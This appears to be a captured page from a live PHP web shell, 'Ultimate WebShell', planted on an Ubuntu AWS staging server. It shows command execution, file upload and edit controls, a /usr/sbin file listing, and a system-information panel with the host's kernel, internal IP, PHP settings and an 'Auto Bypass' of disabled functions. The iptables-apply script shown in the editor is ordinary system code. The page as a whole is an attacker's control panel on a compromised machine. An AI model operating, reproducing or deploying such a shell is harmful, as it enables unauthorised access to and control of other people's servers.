WebShell Manager
Linux Stag-Enterprise-Staging-20-04 5.11.0-1019-aws #20~20.04.1-Ubuntu SMP Tue Sep 21 10:40:39 UTC 2021 x86_64
Apache
Server: 172.31.9.152
Your IP: 216.73.216.236
System Info
HOME
snap
core20
2866
usr
sbin
Command Execution
Execute
File Upload
Upload
New Folder
New File
Name
Type
Size
Permissions
Modified
Actions
..
Parent
-
drwxr-xr-x
2026-04-10 12:14:14
-
aa-remove-unknown
File
3 KB
0755
2024-03-06 18:40:00
aa-status
File
8.63 KB
0755
2024-03-06 18:40:00
aa-teardown
File
139 B
0755
2019-06-17 23:55:38
add-shell
File
860 B
0755
2019-12-07 02:13:44
addgroup
File
36.9 KB
0755
2020-04-16 14:12:53
adduser
File
36.9 KB
0755
2020-04-16 14:12:53
agetty
File
67.38 KB
0755
2026-03-06 16:20:35
apparmor_parser
File
1.46 MB
0755
2024-03-06 18:40:00
apparmor_status
File
8.63 KB
0755
2024-03-06 18:40:00
arpd
File
78.27 KB
0755
2020-02-13 17:21:59
arptables
File
215.32 KB
0755
2023-05-09 18:39:57
arptables-nft
File
215.32 KB
0755
2023-05-09 18:39:57
arptables-nft-restore
File
215.32 KB
0755
2023-05-09 18:39:57
arptables-nft-save
File
215.32 KB
0755
2023-05-09 18:39:57
arptables-restore
File
215.32 KB
0755
2023-05-09 18:39:57
arptables-save
File
215.32 KB
0755
2023-05-09 18:39:57
badblocks
File
34.32 KB
0755
2023-10-09 01:56:01
blkdeactivate
File
14.49 KB
0755
2020-02-13 21:21:51
blkdiscard
File
34.23 KB
0755
2026-03-06 16:20:35
blkid
File
118.26 KB
0755
2026-03-06 16:20:35
blkzone
File
70.23 KB
0755
2026-03-06 16:20:35
blockdev
File
66.23 KB
0755
2026-03-06 16:20:35
bridge
File
102.3 KB
0755
2020-02-13 17:21:59
capsh
File
30.3 KB
0755
2025-02-20 16:01:08
cfdisk
File
102.59 KB
0755
2026-03-06 16:20:35
chcpu
File
46.23 KB
0755
2026-03-06 16:20:35
chgpasswd
File
66.2 KB
0755
2024-02-06 12:49:54
chmem
File
62.23 KB
0755
2026-03-06 16:20:35
chpasswd
File
58.2 KB
0755
2024-02-06 12:49:54
chroot
File
42.34 KB
0755
2019-09-05 10:38:40
cpgr
File
60.34 KB
0755
2024-02-06 12:49:54
cppw
File
60.34 KB
0755
2024-02-06 12:49:54
cryptdisks_start
File
1.51 KB
0755
2020-02-04 13:11:12
cryptdisks_stop
File
844 B
0755
2020-02-04 13:11:12
cryptsetup
File
135.54 KB
0755
2025-01-29 18:37:57
cryptsetup-reencrypt
File
105.32 KB
0755
2025-01-29 18:37:57
ctrlaltdel
File
38.23 KB
0755
2026-03-06 16:20:35
debugfs
File
225.8 KB
0755
2023-10-09 01:56:01
delgroup
File
16.11 KB
0755
2020-04-16 14:12:53
deluser
File
16.11 KB
0755
2020-04-16 14:12:53
depmod
File
170.34 KB
0755
2020-03-12 13:15:28
devlink
File
150.47 KB
0755
2020-02-13 17:21:59
dhclient
File
508.98 KB
0755
2023-01-31 22:10:35
dhclient-script
File
15.92 KB
0755
2023-01-31 22:10:35
dmsetup
File
171.02 KB
0755
2020-02-13 21:21:51
dmstats
File
171.02 KB
0755
2020-02-13 21:21:51
dosfsck
File
58.08 KB
0755
2018-05-12 22:59:39
dosfslabel
File
54.08 KB
0755
2018-05-12 22:59:39
dumpe2fs
File
30.38 KB
0755
2023-10-09 01:56:01
e2freefrag
File
18.38 KB
0755
2023-10-09 01:56:01
e2fsck
File
327.21 KB
0755
2023-10-09 01:56:01
e2image
File
42.38 KB
0755
2023-10-09 01:56:01
e2label
File
106.55 KB
0755
2023-10-09 01:56:01
e2mmpstatus
File
30.38 KB
0755
2023-10-09 01:56:01
e2scrub
File
7.13 KB
0755
2023-10-09 01:56:01
e2scrub_all
File
5.27 KB
0755
2023-10-09 01:56:01
e2undo
File
22.38 KB
0755
2023-10-09 01:56:01
e4crypt
File
30.38 KB
0755
2023-10-09 01:56:01
e4defrag
File
34.3 KB
0755
2023-10-09 01:56:01
ebtables
File
215.32 KB
0755
2023-05-09 18:39:57
ebtables-nft
File
215.32 KB
0755
2023-05-09 18:39:57
ebtables-nft-restore
File
215.32 KB
0755
2023-05-09 18:39:57
ebtables-nft-save
File
215.32 KB
0755
2023-05-09 18:39:57
ebtables-restore
File
215.32 KB
0755
2023-05-09 18:39:57
ebtables-save
File
215.32 KB
0755
2023-05-09 18:39:57
faillock
File
14.15 KB
0755
2024-01-10 13:55:08
fatlabel
File
54.08 KB
0755
2018-05-12 22:59:39
fdformat
File
34.23 KB
0755
2026-03-06 16:20:35
fdisk
File
150.27 KB
0755
2026-03-06 16:20:35
filefrag
File
18.33 KB
0755
2023-10-09 01:56:01
findfs
File
14.23 KB
0755
2026-03-06 16:20:35
fsck
File
54.27 KB
0755
2026-03-06 16:20:35
fsck.cramfs
File
38.26 KB
0755
2026-03-06 16:20:35
fsck.ext2
File
327.21 KB
0755
2023-10-09 01:56:01
fsck.ext3
File
327.21 KB
0755
2023-10-09 01:56:01
fsck.ext4
File
327.21 KB
0755
2023-10-09 01:56:01
fsck.fat
File
58.08 KB
0755
2018-05-12 22:59:39
fsck.minix
File
122.25 KB
0755
2026-03-06 16:20:35
fsck.msdos
File
58.08 KB
0755
2018-05-12 22:59:39
fsck.vfat
File
58.08 KB
0755
2018-05-12 22:59:39
fsfreeze
File
14.23 KB
0755
2026-03-06 16:20:35
fstab-decode
File
14.3 KB
0755
2020-02-13 18:38:21
fstrim
File
70.23 KB
0755
2026-03-06 16:20:35
genl
File
82.29 KB
0755
2020-02-13 17:21:59
getcap
File
14.3 KB
0755
2025-02-20 16:01:08
getpcaps
File
14.3 KB
0755
2025-02-20 16:01:08
getty
File
67.38 KB
0755
2026-03-06 16:20:35
groupadd
File
90.95 KB
0755
2024-02-06 12:49:54
groupdel
File
86.77 KB
0755
2024-02-06 12:49:54
groupmems
File
62.24 KB
0755
2024-02-06 12:49:54
groupmod
File
94.86 KB
0755
2024-02-06 12:49:54
grpck
File
62.18 KB
0755
2024-02-06 12:49:54
grpconv
File
58.05 KB
0755
2024-02-06 12:49:54
grpunconv
File
58.05 KB
0755
2024-02-06 12:49:54
halt
File
973.23 KB
0755
2023-03-02 12:58:02
hwclock
File
102.35 KB
0755
2026-03-06 16:20:35
iconvconfig
File
30.4 KB
0755
2026-01-30 08:05:14
init
File
1.55 MB
0755
2023-03-02 12:58:02
insmod
File
170.34 KB
0755
2020-03-12 13:15:28
installkernel
File
2.58 KB
0755
2019-12-07 02:13:44
integritysetup
File
60.23 KB
0755
2025-01-29 18:37:57
invoke-rc.d
File
16.64 KB
0755
2019-06-21 18:56:55
ip
File
597.62 KB
0755
2020-02-13 17:21:59
ip6tables
File
96.97 KB
0755
2023-05-09 18:39:57
ip6tables-apply
File
6.89 KB
0755
2023-05-09 18:39:57
ip6tables-legacy
File
96.97 KB
0755
2023-05-09 18:39:57
ip6tables-legacy-restore
File
96.97 KB
0755
2023-05-09 18:39:57
ip6tables-legacy-save
File
96.97 KB
0755
2023-05-09 18:39:57
ip6tables-nft
File
215.32 KB
0755
2023-05-09 18:39:57
ip6tables-nft-restore
File
215.32 KB
0755
2023-05-09 18:39:57
ip6tables-nft-save
File
215.32 KB
0755
2023-05-09 18:39:57
ip6tables-restore
File
96.97 KB
0755
2023-05-09 18:39:57
ip6tables-restore-translate
File
215.32 KB
0755
2023-05-09 18:39:57
ip6tables-save
File
96.97 KB
0755
2023-05-09 18:39:57
ip6tables-translate
File
215.32 KB
0755
2023-05-09 18:39:57
iptables
File
96.97 KB
0755
2023-05-09 18:39:57
iptables-apply
File
6.89 KB
0755
2023-05-09 18:39:57
iptables-legacy
File
96.97 KB
0755
2023-05-09 18:39:57
iptables-legacy-restore
File
96.97 KB
0755
2023-05-09 18:39:57
iptables-legacy-save
File
96.97 KB
0755
2023-05-09 18:39:57
iptables-nft
File
215.32 KB
0755
2023-05-09 18:39:57
iptables-nft-restore
File
215.32 KB
0755
2023-05-09 18:39:57
iptables-nft-save
File
215.32 KB
0755
2023-05-09 18:39:57
iptables-restore
File
96.97 KB
0755
2023-05-09 18:39:57
iptables-restore-translate
File
215.32 KB
0755
2023-05-09 18:39:57
iptables-save
File
96.97 KB
0755
2023-05-09 18:39:57
iptables-translate
File
215.32 KB
0755
2023-05-09 18:39:57
isosize
File
30.23 KB
0755
2026-03-06 16:20:35
killall5
File
26.38 KB
0755
2020-02-13 18:38:21
ldattach
File
34.23 KB
0755
2026-03-06 16:20:35
ldconfig
File
387 B
0755
2026-01-30 08:05:14
ldconfig.real
File
1 MB
0755
2026-01-30 08:05:14
logsave
File
14.16 KB
0755
2023-10-09 01:56:01
losetup
File
110.34 KB
0755
2026-03-06 16:20:35
lsmod
File
170.34 KB
0755
2020-03-12 13:15:28
luksformat
File
3.32 KB
0755
2020-02-04 13:11:12
mkdosfs
File
34.5 KB
0755
2018-05-12 22:59:39
mke2fs
File
134.62 KB
0755
2023-10-09 01:56:01
mkfs
File
14.23 KB
0755
2026-03-06 16:20:35
mkfs.bfs
File
34.23 KB
0755
2026-03-06 16:20:35
mkfs.cramfs
File
42.16 KB
0755
2026-03-06 16:20:35
mkfs.ext2
File
134.62 KB
0755
2023-10-09 01:56:01
mkfs.ext3
File
134.62 KB
0755
2023-10-09 01:56:01
mkfs.ext4
File
134.62 KB
0755
2023-10-09 01:56:01
mkfs.fat
File
34.5 KB
0755
2018-05-12 22:59:39
mkfs.minix
File
106.23 KB
0755
2026-03-06 16:20:35
mkfs.msdos
File
34.5 KB
0755
2018-05-12 22:59:39
mkfs.vfat
File
34.5 KB
0755
2018-05-12 22:59:39
mkhomedir_helper
File
22.17 KB
0755
2024-01-10 13:55:08
mklost+found
File
14.3 KB
0755
2023-10-09 01:56:01
mkswap
File
106.23 KB
0755
2026-03-06 16:20:35
modinfo
File
170.34 KB
0755
2020-03-12 13:15:28
modprobe
File
170.34 KB
0755
2020-03-12 13:15:28
netplan
File
798 B
0755
2024-06-28 16:59:34
newusers
File
98.8 KB
0755
2024-02-06 12:49:54
nfnl_osf
File
18.3 KB
0755
2023-05-09 18:39:57
nologin
File
14.3 KB
0755
2024-02-06 12:49:54
pam-auth-update
File
19.86 KB
0755
2021-09-17 06:05:34
pam_extrausers_chkpwd
File
42.16 KB
2755
2024-01-10 13:55:08
pam_extrausers_update
File
42.16 KB
0755
2024-01-10 13:55:08
pam_getenv
File
2.82 KB
0755
2020-08-12 00:15:04
pam_tally
File
14.16 KB
0755
2024-01-10 13:55:08
pam_tally2
File
18.16 KB
0755
2024-01-10 13:55:08
pam_timestamp_check
File
14.15 KB
0755
2024-01-10 13:55:08
pivot_root
File
14.23 KB
0755
2026-03-06 16:20:35
poweroff
File
973.23 KB
0755
2023-03-02 12:58:02
pwck
File
58.17 KB
0755
2024-02-06 12:49:54
pwconv
File
54.05 KB
0755
2024-02-06 12:49:54
pwunconv
File
54.05 KB
0755
2024-02-06 12:49:54
raw
File
14.23 KB
0755
2026-03-06 16:20:35
readprofile
File
22.26 KB
0755
2026-03-06 16:20:35
reboot
File
973.23 KB
0755
2023-03-02 12:58:02
remove-shell
File
904 B
0755
2019-12-07 02:13:44
resize2fs
File
66.38 KB
0755
2023-10-09 01:56:01
rfkill
File
50.23 KB
0755
2026-03-06 16:20:35
rmmod
File
170.34 KB
0755
2020-03-12 13:15:28
rmt
File
58.55 KB
0755
2023-12-05 05:16:50
rmt-tar
File
58.55 KB
0755
2023-12-05 05:16:50
rtacct
File
48.29 KB
0755
2020-02-13 17:21:59
rtcwake
File
46.23 KB
0755
2026-03-06 16:20:35
rtmon
File
78.24 KB
0755
2020-02-13 17:21:59
runlevel
File
973.23 KB
0755
2023-03-02 12:58:02
runuser
File
66.23 KB
0755
2026-03-06 16:20:35
service
File
9.04 KB
0755
2019-06-21 18:56:55
setcap
File
14.3 KB
0755
2025-02-20 16:01:08
sfdisk
File
138.23 KB
0755
2026-03-06 16:20:35
shadowconfig
File
885 B
0755
2021-07-14 22:08:18
shutdown
File
973.23 KB
0755
2023-03-02 12:58:02
sshd
File
863.79 KB
0755
2026-03-05 19:37:37
start-stop-daemon
File
47.32 KB
0755
2022-05-25 11:14:20
sulogin
File
50.23 KB
0755
2026-03-06 16:20:35
swaplabel
File
18.23 KB
0755
2026-03-06 16:20:35
swapoff
File
22.23 KB
0755
2026-03-06 16:20:35
swapon
File
50.23 KB
0755
2026-03-06 16:20:35
switch_root
File
14.23 KB
0755
2026-03-06 16:20:35
sysctl
File
30.23 KB
0755
2023-10-31 11:35:56
tarcat
File
936 B
0755
2023-12-05 05:16:50
tc
File
529.45 KB
0755
2020-02-13 17:21:59
telinit
File
973.23 KB
0755
2023-03-02 12:58:02
tipc
File
126.23 KB
0755
2020-02-13 17:21:59
tune2fs
File
106.55 KB
0755
2023-10-09 01:56:01
tzconfig
File
106 B
0755
2025-04-22 10:15:47
unix_chkpwd
File
42.15 KB
2755
2024-01-10 13:55:08
unix_update
File
42.15 KB
0755
2024-01-10 13:55:08
update-ca-certificates
File
5.29 KB
0755
2024-09-24 17:46:09
update-mime
File
9.18 KB
0755
2019-10-18 23:05:50
update-passwd
File
34.56 KB
0755
2019-12-16 23:51:51
update-rc.d
File
16.76 KB
0755
2019-06-21 18:56:55
useradd
File
143.71 KB
0755
2024-02-06 12:49:54
userdel
File
98.89 KB
0755
2024-02-06 12:49:54
usermod
File
139.49 KB
0755
2024-02-06 12:49:54
veritysetup
File
51.82 KB
0755
2025-01-29 18:37:57
vigr
File
68.55 KB
0755
2024-02-06 12:49:54
vipw
File
68.55 KB
0755
2024-02-06 12:49:54
visudo
File
218.2 KB
0755
2025-06-25 20:10:55
wipefs
File
46.23 KB
0755
2026-03-06 16:20:35
wpa_action
File
1.69 KB
0755
2019-08-13 23:12:36
wpa_cli
File
152.22 KB
0755
2025-02-24 20:14:55
wpa_supplicant
File
2.77 MB
0755
2025-02-24 20:14:55
xtables-legacy-multi
File
96.97 KB
0755
2023-05-09 18:39:57
xtables-monitor
File
215.32 KB
0755
2023-05-09 18:39:57
xtables-nft-multi
File
215.32 KB
0755
2023-05-09 18:39:57
zic
File
62.29 KB
0755
2026-01-30 08:05:14
zramctl
File
114.34 KB
0755
2026-03-06 16:20:35
0
items selected
Choose Action...
Delete Selected
Zip Selected
Unzip Selected
Execute Action
Clear Selection
© Ultimate WebShell | Auto Bypass Enabled
Create New Folder
Create New File
Edit File: iptables-apply
#!/bin/bash # iptables-apply -- a safer way to update iptables remotely # # Usage: # iptables-apply [-hV] [-t timeout] [-w savefile] {[rulesfile]|-c [runcmd]} # # Versions: # * 1.0 Copyright 2006 Martin F. Krafft <madduck@madduck.net> # Original version # * 1.1 Copyright 2010 GW <gw.2010@tnode.com or http://gw.tnode.com/> # Added parameter -c (run command) # Added parameter -w (save successfully applied rules to file) # Major code cleanup # # Released under the terms of the Artistic Licence 2.0 # set -eu PROGNAME="${0##*/}" VERSION=1.1 ### Default settings DEF_TIMEOUT=10 MODE=0 # apply rulesfile mode # MODE=1 # run command mode case "$PROGNAME" in (*6*) SAVE=ip6tables-save RESTORE=ip6tables-restore DEF_RULESFILE="/etc/network/ip6tables.up.rules" DEF_SAVEFILE="$DEF_RULESFILE" DEF_RUNCMD="/etc/network/ip6tables.up.run" ;; (*) SAVE=iptables-save RESTORE=iptables-restore DEF_RULESFILE="/etc/network/iptables.up.rules" DEF_SAVEFILE="$DEF_RULESFILE" DEF_RUNCMD="/etc/network/iptables.up.run" ;; esac ### Functions function blurb() { cat <<-__EOF__ $PROGNAME $VERSION -- a safer way to update iptables remotely __EOF__ } function copyright() { cat <<-__EOF__ $PROGNAME has been published under the terms of the Artistic Licence 2.0. Original version - Copyright 2006 Martin F. Krafft <madduck@madduck.net>. Version 1.1 - Copyright 2010 GW <gw.2010@tnode.com or http://gw.tnode.com/>. __EOF__ } function about() { blurb echo copyright } function usage() { blurb echo cat <<-__EOF__ Usage: $PROGNAME [-hV] [-t timeout] [-w savefile] {[rulesfile]|-c [runcmd]} The script will try to apply a new rulesfile (as output by iptables-save, read by iptables-restore) or run a command to configure iptables and then prompt the user whether the changes are okay. If the new iptables rules cut the existing connection, the user will not be able to answer affirmatively. In this case, the script rolls back to the previous working iptables rules after the timeout expires. Successfully applied rules can also be written to savefile and later used to roll back to this state. This can be used to implement a store last good configuration mechanism when experimenting with an iptables setup script: $PROGNAME -w $DEF_SAVEFILE -c $DEF_RUNCMD When called as ip6tables-apply, the script will use ip6tables-save/-restore and IPv6 default values instead. Default value for rulesfile is '$DEF_RULESFILE'. Options: -t seconds, --timeout seconds Specify the timeout in seconds (default: $DEF_TIMEOUT). -w savefile, --write savefile Specify the savefile where successfully applied rules will be written to (default if empty string is given: $DEF_SAVEFILE). -c runcmd, --command runcmd Run command runcmd to configure iptables instead of applying a rulesfile (default: $DEF_RUNCMD). -h, --help Display this help text. -V, --version Display version information. __EOF__ } function checkcommands() { for cmd in "${COMMANDS[@]}"; do if ! command -v "$cmd" >/dev/null; then echo "Error: needed command not found: $cmd" >&2 exit 127 fi done } function revertrules() { echo -n "Reverting to old iptables rules... " "$RESTORE" <"$TMPFILE" echo "done." } ### Parsing and checking parameters TIMEOUT="$DEF_TIMEOUT" SAVEFILE="" SHORTOPTS="t:w:chV"; LONGOPTS="timeout:,write:,command,help,version"; OPTS=$(getopt -s bash -o "$SHORTOPTS" -l "$LONGOPTS" -n "$PROGNAME" -- "$@") || exit $? for opt in $OPTS; do case "$opt" in (-*) unset OPT_STATE ;; (*) case "${OPT_STATE:-}" in (SET_TIMEOUT) eval TIMEOUT=$opt;; (SET_SAVEFILE) eval SAVEFILE=$opt [ -z "$SAVEFILE" ] && SAVEFILE="$DEF_SAVEFILE" ;; esac ;; esac case "$opt" in (-t|--timeout) OPT_STATE="SET_TIMEOUT";; (-w|--write) OPT_STATE="SET_SAVEFILE";; (-c|--command) MODE=1;; (-h|--help) usage >&2; exit 0;; (-V|--version) about >&2; exit 0;; (--) break;; esac shift done # Validate parameters if [ "$TIMEOUT" -ge 0 ] 2>/dev/null; then TIMEOUT=$(($TIMEOUT)) else echo "Error: timeout must be a positive number" >&2 exit 1 fi if [ -n "$SAVEFILE" -a -e "$SAVEFILE" -a ! -w "$SAVEFILE" ]; then echo "Error: savefile not writable: $SAVEFILE" >&2 exit 8 fi case "$MODE" in (1) # Treat parameter as runcmd (run command mode) RUNCMD="${1:-$DEF_RUNCMD}" if [ ! -x "$RUNCMD" ]; then echo "Error: runcmd not executable: $RUNCMD" >&2 exit 6 fi # Needed commands COMMANDS=(mktemp "$SAVE" "$RESTORE" "$RUNCMD") checkcommands ;; (*) # Treat parameter as rulesfile (apply rulesfile mode) RULESFILE="${1:-$DEF_RULESFILE}"; if [ ! -r "$RULESFILE" ]; then echo "Error: rulesfile not readable: $RULESFILE" >&2 exit 2 fi # Needed commands COMMANDS=(mktemp "$SAVE" "$RESTORE") checkcommands ;; esac ### Begin work # Store old iptables rules to temporary file TMPFILE=`mktemp /tmp/$PROGNAME-XXXXXXXX` trap "rm -f $TMPFILE" EXIT HUP INT QUIT ILL TRAP ABRT BUS \ FPE USR1 SEGV USR2 PIPE ALRM TERM if ! "$SAVE" >"$TMPFILE"; then # An error occured if ! grep -q ipt /proc/modules 2>/dev/null; then echo "Error: iptables support lacking from the kernel" >&2 exit 3 else echo "Error: unknown error saving old iptables rules: $TMPFILE" >&2 exit 4 fi fi # Legacy to stop the fail2ban daemon if present [ -x /etc/init.d/fail2ban ] && /etc/init.d/fail2ban stop # Configure iptables case "$MODE" in (1) # Run command in background and kill it if it times out echo -n "Running command '$RUNCMD'... " "$RUNCMD" & CMD_PID=$! ( sleep "$TIMEOUT"; kill "$CMD_PID" 2>/dev/null; exit 0 ) & CMDTIMEOUT_PID=$! if ! wait "$CMD_PID"; then echo "failed." echo "Error: unknown error running command: $RUNCMD" >&2 revertrules exit 7 else echo "done." fi ;; (*) # Apply iptables rulesfile echo -n "Applying new iptables rules from '$RULESFILE'... " if ! "$RESTORE" <"$RULESFILE"; then echo "failed." echo "Error: unknown error applying new iptables rules: $RULESFILE" >&2 revertrules exit 5 else echo "done." fi ;; esac # Prompt user for confirmation echo -n "Can you establish NEW connections to the machine? (y/N) " read -n1 -t "$TIMEOUT" ret 2>&1 || : case "${ret:-}" in (y*|Y*) # Success echo if [ ! -z "$SAVEFILE" ]; then # Write successfully applied rules to the savefile echo "Writing successfully applied rules to '$SAVEFILE'..." if ! "$SAVE" >"$SAVEFILE"; then echo "Error: unknown error writing successfully applied rules: $SAVEFILE" >&2 exit 9 fi fi echo "... then my job is done. See you next time." ;; (*) # Failed echo if [ -z "${ret:-}" ]; then echo "Timeout! Something happened (or did not). Better play it safe..." else echo "No affirmative response! Better play it safe..." fi revertrules exit 255 ;; esac # Legacy to start the fail2ban daemon again [ -x /etc/init.d/fail2ban ] && /etc/init.d/fail2ban start exit 0 # vim:noet:sw=8
Rename
Change Permissions
Common permissions: 755 (rwxr-xr-x), 644 (rw-r--r--), 777 (rwxrwxrwx)
System Information
Uname: Linux Stag-Enterprise-Staging-20-04 5.11.0-1019-aws #20~20.04.1-Ubuntu SMP Tue Sep 21 10:40:39 UTC 2021 x86_64 Software: Apache PHP Version: 7.4.3-4ubuntu2.29 Protocol: HTTP/1.1 Server IP: 172.31.9.152 Your IP: 216.73.216.236 Mail: ON Curl: ON Owner: www-data MySQL: ON Disabled Functions: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare, Auto Bypass: ENABLED